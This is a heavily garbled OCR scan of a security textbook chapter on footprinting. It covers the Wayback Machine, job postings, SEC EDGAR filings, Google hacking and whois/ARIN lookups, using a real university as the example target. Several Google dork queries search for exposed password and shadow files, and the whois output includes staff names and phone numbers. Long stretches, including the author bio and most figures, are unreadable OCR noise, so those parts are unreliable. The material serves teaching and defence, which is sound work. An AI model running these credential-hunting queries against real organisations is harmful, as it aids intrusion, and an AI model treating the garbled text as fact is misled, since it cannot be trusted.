network AxirtE. and ojb jwsft, »cvrtr Mrfl^ iffifltf pill. sfcSLrrt* ba»ic*. *xl product rtjtaJijitin At toirlt; *rplrbs rd hatb’tfi irfilBPwbri, *8 teach cur cvstowni tie tE aaorrty produce and sbtyicss r fie fflarto$rl»ft Our gpal * to h
« or
ojvt&TTVE bacam SKurrty iwat

U SO^KCnS, N :>.i n . r :wi -. .-r i I
Vjpitjt: J? Sfflifiwl tr>’ all ma£r
ccfnu-w iwoas; ttmallovrt usuu

ci f ImjwIfHty* n<Xl 4 Jls fT^k* fi>j
*-4h rrA pjv! a wUhn but 4 ftferibr

BLpartr SakjUnS, Inc. htobMn frctrirrj
V (ustnmer Hn« for ekman TW*
[ At cflic u 1v apunri crt ti 1WJ . Oir
frewr sbfl members ara uniftjfcted r
rtw knofcfcjLj?. t>prf bJC of ther rurd
le
i'”HJ e>periwe ;a*ie *t resul of reart
of hljfcjy tf»:uJn»d wrrk Mid cmCKt with thcuundi of paqib.
Cur ma’iigefli&n caarn nckdte

launder Jrtd Cligf IJrHjraCkiq trfflfW

j^t faiepp – (ha S»ef cr SoluDani , He, fcxrtter i

buWng r H ! svturtff uUan tS dr t-j s-T dtoyt
0^
vxr*rx W4 j c^lierswcur hj 1 fl^pufi facmssd on IT
ns**wta warty nwetmanfe. Em tmutfi bedng the
firm rcrturrw* a larg* amount err Mr. Creagfc tut*, I* artp^s

«3 , ng. r. hsi * proven rpp^on fini ? Ceramic
jnd liflymbil ipeJ*r .

His FTi^tn wrrfe n hr fiokt of IT soever rcLxkr thsp

rxbiCdtKn of sbulBoi security boc+–s ho “-a >: cht* ajiftx ed w

ca-ArthgracL •romr* al trr-vr trtfcre nebcin : i=^ngrpa:’s Hid’ S»
5)Wt Src
f”s SKtf^r S«tSt:# i3L“i f.’K? 1 c?*!-j J r

Hxf&r &&mft*p i. Ha iko ehj+p>« 4&rii Abftmswt Shuj^
jf-=dff.7i^ro>’ iflinrs pubiomt it U yw aw NHwih
Sscut^ ub »t Wiley and Tte C£/WmS ttt/tatiati Sat&ny

Mr. Gregg- boWs *sax <tec#e«, i iMd-elci V w.
jri£3 j lustnr’r dag’Ki.

Otrtiness Devdapfliem Otreetw

but to an att ticker that same information may be gold. Consider u practice that used
to be quite common: the posting of com p tiny directories on the company Web site. Such
information mtiy not seem like a problem except that it gives an at t ticker valuable contact
information for employees that may be used to impersonate these individuals. Of course,
what is valuable is not just what is visible on a Web site; it can also be the source code
or HTML that is used to design the site. Tt is possible for a particularly astute attacker
to browse through the source code and locate comments or other pieces of information
that can give insight into an organization.

The following is an exam pic of HTML code with comments

<html>
<heatl >

<tit!e>Company Web page</title>

<body>

<!— This Web page prompts for the password to login to the database server
HAL9000 ->

</body>

</html>

110 PART 2 A Technical Overview of Hacking

NOTE

Site ripping tools such as
Black widow Pro or Wget can
be used to extract a complete
copy of the Web site.

The comment included here may .seem harmless, but it would tell
an attacker the name of the server that is being accessed, assisting
in targeting an attack.

Over the last decade, companies have gotten the message that
posting some information on the company Web site is not ad vis ah le.
In some cases, organizations have removed in formation that could
reveal die tails about internal process, personnel, and other assets.
On the surface, it would seem that once information is removed
from a Web site the problem is eliminated, but this is far from true. In the case of a Web
site, the state of a Weh site at a particular point in time may still exist somewhere out in
cyberspace. One of the tools that a security professional can use to gain information ahout
a past version of a Web site is something known as the W’ayback Machine. It is a Web
application created by the Internet Archive that takes “snapshots’ 1 of a Weh site at regular
intervals and makes them aval I ah le to anyone w r ho looks. With the Wayhack Machine,
it is possible to recover information that w T as posted on a Web site sometime in the past.
However, the information may be hopelessly out of date and of limited use. The Way back
Machine is available at http’Jj http://www.archive.. org/. An example of this Web site is shown
in Figure 5-2.

When a Web site address is entered into the Wayhack Machine.

the site will return a list of dates representing when a IVeb site was
archived w T ith an asterisk next to any date on which a change was
made. Although the Internet Archive does not keep exhaustive
results on every Web site, the Web sites it does archive can stretch
all the way back to 199ft. Currently the Internet Archive has a
sizable amount of content cataloged estimated to be in excess of
li>fl billion Web pages and related content. Of note in the Internet
Archive is the fact that every Web site on the Internet is not
archived, and those that are may not always go back far enough
to reveal any useful information. Another potential drawback Ls
that a site administrator, through use of a lile called robots. bet,
can block the Internet Archive from making snapshots of the site,
denying anyone the use of old information. Figure 5-3 shows
an example of how far back Web pages go for a specific company.

NOTE

The Internet ArchFve is intended
to be a historical archive of trie
Internet for the purposes of
research arid historical interests.
Originally started in 1996, the
I nternet Arch ive has grown to
include the archived versions
of more than 150 billion Web
pages; the archive has since been
enhanced to include text, video r
and images and other content.

f

Web

15Q billion pJij)M

IGURE 5-2

Way back Machine query.

CHAPTER 5 Footprinting Tools and Techniques

111

Results ror Jan 01. 1995

ifcjjfijail
Ajl1G_20Q1 *

esq*!

■”J ™

EH

2001
ii win

ana ■

Aug D$. ZM5 ,.. I i » a™ ‘ joJi^XU ■ Oct L1J2KB * VEUiV’,’., wwiH. am ft*t Cl MtP &mn am t»i ir. 1 -: » iw >t mm * in p»gtP tf» a m* ‘ L3.I3CM * fr[ ri.aai – -TbL*.3it>S. * Fit “S JDS Mr:* m’ MPT it APS * ■bnlTI ^TTlfi ■ V.J J l.Jt.*2 frij ?\ xr>= ■OrHh.aK JW.3L3S’ Jjn2l.J0or • .’ju ill JBI * A,r, -t, an? * Balm -i;.i:.:o:r g^, ib. -ynr ten]’ 3flOT Q-LIO? XTH T oam aw m in., amy g.iJilJBK Maj ?j jttfl FIGURE 5 3 Wayback Machine results. Of course, the Internet Archive is only one source from which valuable information can be gleaned about tin intended target; tin other valuable source is job postings. Consider that the job postings a company posts on the corporate Web site or on job boards can give valuable clues into what the infrastructure they use looks like. IT should take note of the skills being requested when examining job postings, paying special interest to the skills section, For example, consider the following posting: Expertise Required: • Advanced knowledge of Microsoft XF, 7, Server 200 5; and products such as Microsoft Access, Microsoft SQL Server, Microsoft HSvf>. Visual Basic • Proficient in Excel, Word, and PowerPoint 2007 • Re levant Experien ce / K now le d ge C isco PIX : Ch ec kpo i n t F i re wa 11 h elp fu 1 but not necessary • Virtual Machine (VMWare), SAP$4F, and other data-gathering systems

• Although this is only a snippet of a larger job posting, it still provides insight into what the
company happens to be using. Think for a moment how an attacker can make use of the
information the company provided. As an example, the attacker could use the information
to attempt to fine tune a later attack, doing some research and locating vulnerabilities
such as:

• Search for vulnerabilities in the discovered products
■ Scan for application specific configuration issues
• Locate product specific defects

• 112

PART 2 A Technical Overview of Hacking

pMOTE

When a company posts a job on a
corporate site or a job posting site
such as dice.com or monster.com,
care should be taken to sanitize the
posting. A company that is thinking
ahead may either choose to be
less specific on skills or remove
Information that easily identifies
the company in question. Sanitizing
seeks to clean up or strip out
sensitive information that may be
too sensitive or too revealing.

If Lhc attacker can successfully use any of the.se attacks, it is
ei simple matter to access the target’s network and do further
harm. On the other hand, if the at t ticker rinds that these vulner-
abilities Eire patched, the posting still provides information
on other software in use and insight into the environment.

Another gem of information that can be useful in job
postings is job location. When browsing a job posting, the
location information, when browsed in conjunction with
skills, can yield insight into potential activities at a location.
When browsing job postings, the appearance of unusual skills
at a specific location can bean indicator of activities such as
those associated with research and development. An attacker
could use the information to target specific locations that
are more likely to contain assets of value.

Discovering Financial Information

It is not surprising that an ever-increasing number of attacks are financially
motivated in nature. Criminals htive discovered that technology can be a new and
very effective way of committing old scams on a new medium. For example, consider
Albert Gonzales, the hacker convicted of the T| Maxx hacking attack. According
to httpJ hvww.’mformatiomveek, com > Mr. Gonzales did not pick his targets at random.

CISCO SYSTEMS IMC CIHJ; 0MMEW7T [sea all camp any filings)

SIC Xtt<- COMPUTER COWHUMCAHONB EQUIPMENT
SlalR iKfton £A| Slain oflre t* |FlscalVar&iq1 0735
4kMte1ani Dfcwlsr Wtc» No 3]
■ivlmiktai Ii-jns .idiom lur’.’iiutaxiJur
5
1 ferchHr irjui-octwn* Tor Piis i apwlmg twntf .

flier Re* ulls

rn

^lar WiClWUMDOl

0 MM! © MM O Vtr

Fib i Fihiil-H

SC 13G
S-B

S-ff

CFAMllA

*k

iZXmM tHitHit **5n- b»n fsci»l Ow(rShi0 ty .no*edu«
Am-po crjoiD3fi36l-10-(WTi hits Soe 15K3

Set unlet Id be- Dlfantf Do employes* ¥\ enipfw? bane Is plan 5.
Arc-no 0001 133 1 1S-Q9-K9.379 (33 Arfl SUA. 333 kH

Stt im**4 to h* affrifi b5tmplWflri trtifl«febtrtlil(ilni
Arena IHH)il«iIi>U
K«T8(3Ji33 Star US KB
Set urtes Id b« nfargr- to emol wes <n smct^?e t)pr
(ii plan s
Atf-no 0rj01193II5-ri9-M8a):i(33Ar{i BtM 05 IS
Cb<rntipe<t; Ham B C i

Arena 000l1«l JS.0*?4.35b6 (34 AdJ Sta 14KB

Atfd*anai diflnibvi picrrzdirft ng mttiitfiltd bif niifipminijiiPinrwid Pull U(i)<13) material

A«-ng DDCH193H^D-Jllli3q» 1J*B

0V aridity report; [Sedipns 1 5 i r 1 J( J}|

Art-flO 0Q011S3liM».?3TCi«(34 Air) S12B § MS

Cl t*- rt report, HBirti I 1)1 . 6.01 , and D DI

A«.ng C90li«il^9*-J3B3S(34 Arq SUs 4<(kB

(L-wntiwpon; namU {11, J 03, and Q Jl

AK-n* CIM11»3I2VD9-23J44)5(34 Axfl Sfifl: »T KH

[fliit«HKl]Cun«nip»p«t, Ban S.QZ

Att-no Cfl01l93i2Srrj9 ?3aj«f .;34 AT3 Sl2a. 14 13

FIGURE 5 4

Cisco EDGAR 10 Q.

CHAPTER 5 Footprinting Tools and Techniques

113

The Value of Footprinting

How important is footprinting? According to the Information Security Forum (ISF) r profit-driven
attacks have largely replaced those of the lone wolf hacker. These new attackers rely or careful
footprinting to determine and select suitable targets. Groups of organized criminal hackers
have even been known to place bogus employees within organizations to provide inside
knowledge that can be used to more effectively carry out an attack.

This new mode of attack is designed to steal valuable and sensitive information or customer
data for financial gain and profit. Although not unheard of, such crimes are rarely carried out
by one person; these attacks are typically the work of criminal networks that bring together
specialist skills and expertise.

Targets were footprinted prior to being attacked: the footprinting process was specifically
used to determine whether a targeted company made enough money to merit an attack.
TJ Ma xx is only one of the ever- in creasing numbers of victims of cy here rime, numbers
that are expected to increase as criminals adopt new methods and technologies.

It is no surprise that the criminal element is quite often attracted to the prospect of
monetary gain, and cybercrime is no exception. When a criminal is choosing a company
to attack based on whether that company makes enough money, items such as publicly
available financial records can prove vital. In the United States, getting information on
the financial health of companies is easy because financial records on publicly traded
companies are available for review. These financial records are easily accessible throu gh
the Securities and Exchange Commission (SEC) Web site at http:ffvvww.sec.gov. On the Web
site, it is possible to review the Electronic Data Gathering, Analysis, and Retrieval system
(EDGAR) database, which contains all sorts of financial information (some updated daily i
All foreign and domestic companies that are publicly traded are legally required to tile
registrEition statements, periodic reports, and other forms electronically through EDGAR,
all of which can be browsed by the public. Of particular interest in the EDGAR database
are the items known as the 10-Qs and 10-Ks. These items arc quarterly and yearly reports
that contain the names, addresses, financial data, and Information about acquired or
divested industries. For example, a search of the EDGAR database for information about
Cisco returns the list of records shown in Figure 5-4.

Closer examination of these records indicates where the company is based, detailed
financial information, and the names of the principals, such as the president and
members of the board, EDGAR is not the only source of this information, however;
other sites provide similar types of information, including the following:

■ Hoovers — h t tp:/ / w ww. hoove rs. com /

• Bloomb erg — h t tp:/ / www. bloom be rg. com /

114

PART 2 A Technical Overview of Hacking

rC m

[

One of the major reasons why Google hacking is so effective is the large amount of information
any given company generates. Statistically, the average company tends to double the amount
of data it possesses every 18 months during normal operations. If a company were to take
only a small fraction of that information and make it accessible from the Internet, it would
be potentially releasing a large amount of information into the world around it.

The previous two methods demonstrated simple but powerful tools that can be used to
gain information about a target. The methods both showed how they can be used in
unintended and new ways to gain information. One more tool that can be used in ways
never really intended is Google, Google contains a tremendous amoun t of information of
all types just waiting to be searched and uncovered. In a process known as Google hacking,
the goal is to locate useful information using techniques already provided by the search
engine in new ways. If you can construct the proper queries, Google search results can
provide hacker useful data about a targeted company. Google is only one search engine;
other search engines, such as Yahoo and Bing> are also vulnerable to being used and
abused in this way.

Why is Google hacking effective? Quite simply it is because Google indexes vast
amounts of information in untold numbers of formats. Google obviously can index Web
pages like any search engine. But Google can also index images, videos, discussion group
postings, and all sorts of file types such as .pdf, ,ppt and more. All the inform tit ion that
Google, or any search engine, gathers is held in large databcises that are designed to be
searchable; you only need to know how to look.

There are numerous resources about the process of Google hacking, but one of the best
is Johnny Long’s Google Hacking Database (CI IDE) at h t tp : i i w w w. hackersforch aritij. org /
gkdbf. This site offers insight into some of the ways an attacker can easily find exploitable
targets and sensiliw daia by using Google’s built-in functionality. An example of what
is found at the Web site is seen in Figure 5-5.

The GIIDB is merely a database of queries that identifies sensitive data and content
that potentially may be of a sensitive nature. Some of the items an attacker can find
are available using the following techniques:

■ Error messages that contain too much information

• Files c on t a i n i n g p as s wo r d s
• Sensitive directories

• Pages con t a in i n g logon por ta Is

• Pages con t a ini n g n el wo rk or vu I n erabilit y d at a

• CHAPTER 5 Footprinting Tools and Technique

115

We Ice me to the Go ogje Hacking Del* bate (GUDB}!

We call idem ‘gacofe’dorks’ Inept or foolish people as regaled by Googf a Wiatevesr
you call ‘Jim b fooli, yoirVe found the c«i1« of Ihe Goog/e Hack: no. UniersB 3 Slop
hf our fonima 1o sn where the- maox Happen
!

AjjmoriH end Vuhirabf iti*$(215 *\mny These searches locate ifWierafcte sews Ti»s* seaiehes a* often getieiaied from Wf»u* secutity adwscjry posit, and in many cases ate proAict flf •rtrsiofrf pacific Error Mei-sagei JB8 #4i!Meg] Really retarded error massages thai say WAY Cod muctif FilflS COAtalntfifg juity into f230 «nuv«^) Mo ufantun** or pjstrtedt. but irtl»itlmg tluf noiw IS* lets Frlaa containing passwords. (135 siaries) PASSWORDS, far lha LOVE OF GODHi Google found PASSWORDS’ Files containing us smarnas !’■*”■ °nlr«-s) These file-s. contain userramK, tart im pasfcwiHds. .. SMI, gaoqle fndmg usenoanies on a w«b sit?.. FwthoHfc (2i entnw) Examples gr qu«rie$ (hjl can hajp a hacker gain a fooihold mco a web <«rvsr
Pages containing login portals p 31′ Etilns-s]

These are login pages fervanous sennces Consider [ham 1he frcnl door gf a
wab&ae’a incira ge-iwiw* fonaiona.

Pages containing network orwlnwabilily data (6$entires) The 5* p^gei Contain Swth things 34 fnwal lag^ homypot lOflS. network information, FDS J)S … a| wrltflf fon stufl ■E.frriSrtnrt Dire-ClQniS 1,61 Cpr¥ltl«^) Ge&oja’s tolled a* of wefc sites tnannj sensdhe directories The files eontameci In heie will vary from iesllwe eo uber-secretl sensitive Online Shopping Info (9 enlitei) EKamjiles. of queries lhal can reveal online shopping info Isfce customer data, EUFPf’er*. orders, credited numb* s, credit camf info, elc VanCiri OnVie Devices ehhies} This- category co-nlains thing s like pnrters. wfleo tcrnerae. and all sons of cool things found on 1 h* web wflh Go ogle Vume-rtble Files$7 enlr^s)

HUNDREDS ofvuliwiable files that Goog/!g can And on websles

\AjM1tTbl SltWt enlnti)

These March** 14 ai sewets win spactft wiwr46ties These f iir«l m a
difergmt way than 1h
staidm found m the “Vulnerable Files’ SKten

Web Server Deledw (?2 tmt*)

These link* demonstrate Geogle’s awesome y to pnjSe wet- $*t**r& What makes this possible is the way in which information is Indexed by a search engine. Specific commands such as intitle instruct Google to search for a term wilhin the title of a document. Some examples of intitle search strings are shown here: ■ intitle: “index of intitle: “index of . bash_hi story etc/shadow i inances. xls • intitle: “index . of intitle: “index of” htpasswd • intitle: “Index of” inuil :maillog The keyword “intitle:” directs Google to search for and return pages which contain the words listed after the intitle: keyword. For example intitle: “index of” finance. xls will return pages that contain files of the name finance.xls. Once these results are returned the attacker can browse the results looking for those that contain sensitive or restricted information that may reveal additional details about the organization. Another popular search parameter IsjUetype, This query allows the search to look for a particular term only within a specific filetype. A few examples of the use of this search string are as follows: f iletype:bak inurl :” ht. access I passwd I shadow htusers ” • f iletype:conf slapd.conf filetype:ctt “msn” f iletype:mdb inurl : “account I users I admin I administrators I passwd Ipassword” • file type: xls inurl : “email .xls” FIGURE 5-5 Google Hacking Database, The keyword “filetype:” instructs Google to return liles that have specific extensions. For example. filelype:doc or iilelypejxls will return all the word or excei documents. To better understand the actual mechanics of this type of attack, a closer examination is necessary With this type of attack an attacker will need some knowledge ahead of time, such as the information gathered from a job posting regarding applications. The attacker can then determine that a company is hosting a Web server and further details such as 116 PART 2 A Technical Overview of Hacking Google W*b ffl Saow^WQftt Wpj J6 1 10 Cf atCM 3.120 V Hmirlrw«.«f “M-CliCfeftJISyS.O 8«iw ft ,JD2i secant -: wrr.-*. : pH]etfOSpr.2W)T mo ::r>; :*c»v<i?.4ar.2aw 1839 . iwwt teptafKW^bi&Mii.CiMr – Cat had • StrTifer FIGURE 5 6 Google Hacking Database search results. the type and version I for example. Microsoft IIS 6,0), An attacker can then use this knowledge to perform a search to uncover whether the company is actually running the Web serve]’ version in question. For example, the attacker may have chosen to attack Cisco and as such will need to locate the Web servers that are running ILS 61) to move their attack to the next phase. Using Google to find Weh servers that are running Microsoft IIS f>.0 servers can be accom plished with a simple Google query such as “in title: index. of “Microsof t-I IS/6.0 Server at H on the Google search page. The results ;>l this search are shown in Figure 5 -ft. NolicelhEU more than 2.0l)i) hils were returned. A final search query that can prove Invatutihle is the Google keyword imtrL The inurl string is used to search within a site’s uniform resource locator CURL). This is very useful if some knowledge of URL strings or with standard URL strings used by different types of applications and systems is possessed. Some common inurl searches include the following: • inurl : admin f i letype : db • inurl : admin inurl :backup inti tie : index .of • inurl: 1f auth_user_fi le. txt” • inurl : 1 7axs/ax- admin . pi” -script inurl : “/ cricket/ graph er . cgi” • The keyword “inurl:” commands Google to return pages which include specific words or characters in the URL. For example, the search request inurl:hyrule will produce such pages that have the word “hyrule” in it. These search queries and variations are very powerful in form at ion -gathering mechanisms that can reveal information that may not be so obvious or accessible normally. Gaining a careful understanding of each search term and key word can allow a potential attacker to gain information about a target that may otherwise be out of view. The security professional who wants to gain additional insight into how footprinting using Google hacking works should experiment with each term and what it reveals. Knowing how they are used by attackers can help prevent the wrong information ending up in a Web search of your organization through the careful planning and securing of data. CHAPTER 5 Footprinting Tools and Techniques Exploring Domain Information Leakage 117 A reality of developing security for tiny public organization is the fact that some information is difficult or impossible to hide. A public company that wants to attract customers must walk a tine line because some information by necessity will have to be made public while other information can be kept secret. An example of information that should be kept secret by any company is domain information, or the information that is associated wilh the registration of an Internet domain, Currently many tools are available that can be used for obtaining types of basic information, including these: • Whois • Ksiookup • Interne t As signe d Nu mbers Autho rity ( IAN A} and Regional Internet Re gistri es (RIRs) to find the range of Internet protocol (IP) addresses • Trace route to determine the locEition of the network Each of these tools can provide valuable information pulled from domain registration information. Manual Registrar Query The Internet Corporation for Assigned Names and Numbers (ICANN) is the primary body charged with management of IP address space allocation, protocol parameter assignment, and domain name system management. Global domain name management is delegated to the Internet Assigned Numbers Authority (IAN A), IAN A is responsible for the global coordination of the Domain Name System (DNS) Root, IP addressing, and other Internet protocol resources, Root Zone Database FIGURE 5-7 Th» Knot ‘ian% Dalabj** rnprffSMfil 5 |h« H«lHq^1»nn clrtailx pi Id|>Ippk doznasfis., ircludaig glTO-i such *$. ” CCW, and ciy.injry-ccn fo TL. D
gucti as \UK L Ab th3 jnanaq ar of 1he DNS raol moe. LaMAis reasortaiblfi for c-aordmalir.inries
celeqat.ans in secordarES <mh IE
policies, and bujca du-is?

Root Zone Database,

Much of 1his d*a h also available- via tlte WHOIS protocol at whots.iana jr y

Domain Tfoe Purpoas } SpMiswirtg Qrgaii is-at ion

country-code

AsCanswn Island

Hrtwxr inTcrrtbsri Cferttr cC Doniari fao-Hn)
cte Co
« wd Wutnt (Awmtian Irtmd)

m

coAimry-tcide

Marred A’-arj Envrsies.

TdKaimnciion RegLMIary AiMhafy CIRAI

AE.PO

ResBwaS for memb*rs chlie air-transport industry

Af cwilrirycpd* AfghanisUn

AG country-code Arthgua and Ba.-buda

UH5A Sc tool c4 Me-Jcr*

1 18 PART 2 A Technical Overview of Hacking

FIGURE 5-3

Maine Servers

EDU registration
services.

HflJI NSrlf#

IP dc -tsfc-s”

192 5 6,30

aQCll:5Ca aSte £1:0:05:30

t.SnW ssrvBfi.RBt

192.2692,30

d.gillrf-ierijKS nBt

192.31.80.30

f glld-terwrt.nst

1. 12 94.30

195 35 51 .30

g.gl Id- er ars.net

192.42.93.30

l.flUd-aewirs.fiH.

192 41

Subdomain Information!

URL Ear rfeitaftoiioti strvic**: hl’p
VUHOIS S«rv>r: whnu iriunum idu

fleece; teai ij^c^rw J50^’2-OS flvjg*&l^Hi>n tfste fgffi-OJ-Of.

When the network range is determined manually, the best resource available lo make
ibis happen is the [ANA Web site at the Root Zone Database page located at http://www
.uina.org/doimuns/root/ di?/. The Root Zone Database represents the delegation details of top
level domains (TLE)s)< including domains such as.com and country-code TLDs such as .us.
As the manager of the DNS root zone, IAN A is responsible for coordinating these delegations
in accordance with its staled policies and procedures. The Web site can be seen in Figure 5-7.

To fully grasp the process of uncovering a domain name and its associated information,
j i is best lo L-xaminu Liu- prut/ess sic-p hy step. In this example, a search lor http://www.smu
.edti will be performed. Of course, the target in this scenario has already been set, but in
the real process the target would be the entity to be attacked. After the target has been
identified £in this case, http://wwniKmu.edu). move through the tist until EDU is located:
ihen click thai pa Lit 4 . Tin- IUH Wen pa tic is shown in figure

At this point, the registration services for the .edu domain are handled by http://www
.edmause.editfediidomain. Once the registrant for ,edu domains has been identified, it is
now possible to use the educause Web site at h t tp:/ / wh ois. cdu c.a use, net I and enter a query
for http://ww w.smu.e du. The results of this query are shown in Figure 5-9.

Because org ani nation and planning are essential skills for security professionals, make
note of the information uncovered for later use. While the organization method that each
individual uses is unique, consider an organization strategy similar to the matrix located
in Table 5-1.

table 5-1 Initial whois findings.

NETWORK RANGE

DNS SERVER

POINT OF
CONTACT

http://www.5mu.edu 1 29. 1 1 9.64. 1 0

129.119.64.10

Bruce Meikle

CHAPTER 5 Footprinting Tools and Technique

119

Who is Lookup

SMI.5 ECU

Search tavulb*.
huu Hamt: SHU. EDIT

Sfcurt**in Kvh(idit l&iivtritty
fltS Alrliti* trim
-Ifch Flacx

tailu, TK 7S27S-M62
UNITED KUTIS

FIGURE 5-9

5MU query.

mm r ..► Ivi “.<r.’ „■■-
Jcj-jc A. Ma.ller

i>i;;*ci:or d£ teiecoimmican: ioni
Sc-i.tt tmrk’L IE 4T. ho ds.se rnivarsaty

ballu* IK ?S27£-C3G1
UNITED STATES
[ill*} 7t” 3 – 4l Z E
J k taiil»rg m , *du

Technical Ci rAn-rt :
St. Bruce BiVl«
Si . JfcCTOEk IfiQima r
“iiLiQhitLtL H
T.liodi.« Uiiuarsity
files .i.iL±lii,* nr.
Dtllu, IX ?i27S-M:#2
IWITID STATIS

£lM*QStaU.-«[3U

KPDITi’.aiFJ. E>L1

1SJ.115.C4. 10
IZJ.iH.S. 2
1Z3. 114. in. a

F’OKiiin record activated: 3 1 -Aijtg- J: 967
ttaHli] raccrd J, art i.ip-lBt»d: US-fa&-I010
boiuin fxpif cs: 31–3ul- 2010

T-s deceraihe the cuerewe. ■ccr-mis^iMi ititMi of

search at th.» US DepA.rT.BC nt of 1 due at ion Of tice of TDFtr.ecorutn.Ey Sduca^icn
azcrndLtfltlon vaib site.

Note that in a matter of a few clicks, it was possible to obtain very detailed information
Eibout the target such as the IP address of the Web server. DNS server IP address, location,
point of contact, and more. In fact, of the information gathered at this point the only
thing that is noticeably absent is the actual information about the network range,

To obtain the network range requires the attacker to visit at least one or more of the
Regional Internet Registries (RIRs). which are responsible for management, distribution,
and registration of public IP addresses within their respective assigned regions. Currently
there are live primary RIRs (see Table 5-2).

Because RIRs are important to the process of information gathering and hacking,
it is important to define the process of using an R1R in the context of hitp:f ? http://www.smu.edu.
When searching for information on the target, it serves some purpose to consider location;
earlier research indicated that the host was located in Dallas. Texas. W r ith this piece
of information in hand, a query can be run using the ARIN site to obtain still more
information about the domain. The hitp:// http://www.arui.net site is shown in Figure 5-10.

120

PART 2 A Technical Overview of Hacking

TABLE 5-2

Regional Internet registries.

REGIONAL INTERNET REGISTRY

REGION OF CONTROL

ARIN

North and South America

A PMC

Asia and Pacific |

RIPE

Europe, Middle East, and parts of Africa

LACNIC

Latin America and the Caribbean

AfriNIC

Africa

1

\ R I N

sTArviiwHOK

HMMFIFR nFliOmrFli PftRTIfjPfcTF prXKIfS- FFFS <. MVOKFS KNCrtMFDGE AFKMJT IK

St AR’ H rtfta^lb

NbWlOftftH? #

^bfJ-liU^! NOW (CP

U LULU LIHUi

IPvI IK.*.,: ||m Bf,|lcinLw
FbHJIInM R«LHirCf-l

L hi-kv Htsm it ■■ kfloi i ■ i . ■ I p ■ i

UlW-K,? |l|p-].Yl* Sill* 1 1″ 1

■-■■■&ik- 1 1 | it-.’-^ r-+<i i

IM. Wfcl 1 -4 M” ASH VJtkl

FIGURE 5-10

ARIN site.

Located in the top-right corner of the Web page is a search box labeled “search whois/’
In this search box, enter the IP address of http: / / http://www.smu.i’du that was recorded earlier
and it is also noted in Table 5-1 for reference, The results are of this search are shown
in Figure 5-11.

You can see that the network range is 129 J ] 9.0.0- 12 9. 119. 2 55 .2 55. With this
information, the last piece of the network range puzzle is in place, and a clear picture
of the address on the network is built. Network range data provides a critical piece of
information for an attacker because it con linns that addresses between 129.119.0.0-
129.119.255.255 a 11 b elo n g to ii t f p : J / w \ \ ‘ iv. smin ‘th i \ th es e a d dress es will be exam in ed
in the next step of the process}. With this last piece of information included, the table
should now resemble what is shown in Table 5-3.

CHAPTER 5 Footprinting Tools and Techniques

1

O’trgtlaroG : 5 □ defter si nethcdisc University

C.r&IS; EMU -3

Jbddxess: 61B5 AlEliae

City: Dallas

3ti»t»Piri?v: TK

Cc^nx r y i US

N*cEflft0fit 129.119.0.0 – 129.119.2jji.fSS

CIDR: 129. 119. C.ay 16

OrtgniJii; AS 183 2 r JtSlSTS, AS 1*7 6

K« t Manx: : S OU lUtE THUH IV

KcHnrtl»: HEI-129-119-0-0-1

Pwmt: wm-i?g-a-O-O-0

NetTypt: Dlritt Assignment

]vM3itvi: : P0WV.CI3.SHD.EDU

W*ee3trvev3 SEAS, SHU, EDU

Nwe3er\«r : E PONY . £ KU . E DU

Updated: ZD 10-02 -ae

JUkbuseHame i
9 JUbusePhoBe :

I50J-ARIH

InJoEWwaost Security Offiw
+1-2 H-TSS-7321

FIGURE 5-11

ARIN results.

HKOCJiaiulle : NDC1961-ARIH

FWOCHMne i Necuorfc Operations Center

RWOCPh&KlSi +1-.314-168-4662

RTeehHatidie: BBMlT-AELCH
RTeeHHiiane : He ik 1 e , F. Bsc uce
RTachFlrcn* ; +1-2 1 4 £9-3 471
J : rbiHraai 1 . snvu.edu

Or irAbMse Handle: ESH-ARIH

Or^JUauseNarae : lnfaetaati6!i Security Of fit*

Or (jib us* P Hose : + 1 -,2 14-7 6B- 7 3 2 1

OrgAJPurc Eras 1 1 : obuseG on™ , c du

OrgNOCDajfudle: HOCl 9 61-HBI M

OcflttOCHw^f; HctuoEk Qpacntlons Center

OcgHOCPhoue : +1-S 1 4-7 68-4 662

OrflNOCEtuai 1 : nocd stun . edu

table s-3 Final whois findings.

NETWORK RANGE

DNS SERVERS

POINT OF
CONTACT

http://www.smu.edu 129.119.64.10 129.119.0.0- 129.119.64.10 Bruce Meikl

129.119.255.255

Automatic Registrar Query

The manual method of obtaining network range information is effective, but it does have
the drawback of taking a significant amount of time. You can speed up the process using
automated methods to gather this informal ion faster than can be done manually. Several
Web sites are dedicated to providing this information in a consolidated view. Numerous
Web sites are also dedicated to providing network range information automatically.

122 PART 2 A Technical Overview of Hacking

FIGURE 5-12

Dniin Nut: 5MU,tW

Domamtools
name query.

Re ci stteoit :

Siyurhein Hethodiat UnlUetSiiy
61B5 Air 1 IBS PllVt
fltJi :-‘Ioui

MlU, TX 75275-0262
1JMITZT’ STATE!;

Msiminriatuve Contact:
).:.-.:.: R. Killer

Diiertor of TeleroMuniciationa
61B5 Airline: El-
4lb FlOOt

41 1.1?., TV 75275 nr-62
UHITET- 5TATE5
(214| 76B-4225

|rmillaf^MTiu.edu

T«c-]mical Contact:

Se. IrntA Engineer

iouchrrn Hrthodiat University
S1*S At rlint £■!-
taJlUj TX 7i2«-«262
ITMJTE& STATES
(31411 7»-34?j,

prawns. siD.rtiij
SWS.SJWh ECU
KfBHTT, SHtLEI’iU
EfOWTf. &H0.EL-U

J29.U9.64.10
125. 119. t-1 8

i2e.ni2.i«2 L iaa

Iism re-cord activated: 31-Auer-
twtiln record lut tfljd
ti4: F*b
Caaaiis skpiecj; 31-Jul-2QlO

Some of the more common or popular destinations for searches of this type include
the following:

h t ip.7/ w ww, sam spade, o rjj
h t fp: ii iv ww, t ienvhois. com
h t tp’J / iv ww, a flw Jio is. com
http://geektools. com
h t tp’J / iv ww, aU- } i e.t too h. com
h t tp’J / iv ww. sn j a rtwhois, com
http’Ji iv ww, cfrt&s f ujfjf com
h t tp’J / iv ww. snmsparie. o
h t fp: / / ivhoi s, domain tools. i:o m

A point to remember is that no matter what tool the professional prefers, the goal is to
obtain registrar information. As an example. Figure 5-12 shows the results of http’Ji
u? hois, dam am tools, com whe n h ttpi/f w ww. sm u. edn was q u e ri ed lb r i n form a 1 i on .

Underlying all these tools is a tool known as whois, which is software designed to query
Lhe databases that hold registration information. Whois is a utility that has been specifically
designed to interrogate the Internet domain name administration system and return the
domain ownership, address^ location, phone number, and other detEiils Eibouta specified

CHAPTER 5 Footprinting Tools and Technique

123

domain name. The accessibility of this tool depends on the operating system in use.
For Linux users, the tool is just a command prompt away; Windows users have to locate
ti Windows-compatible version and download it or use a Web site that provides the service,

Whois

The Whois protocol was designed to query databases to look up and identify the registrant
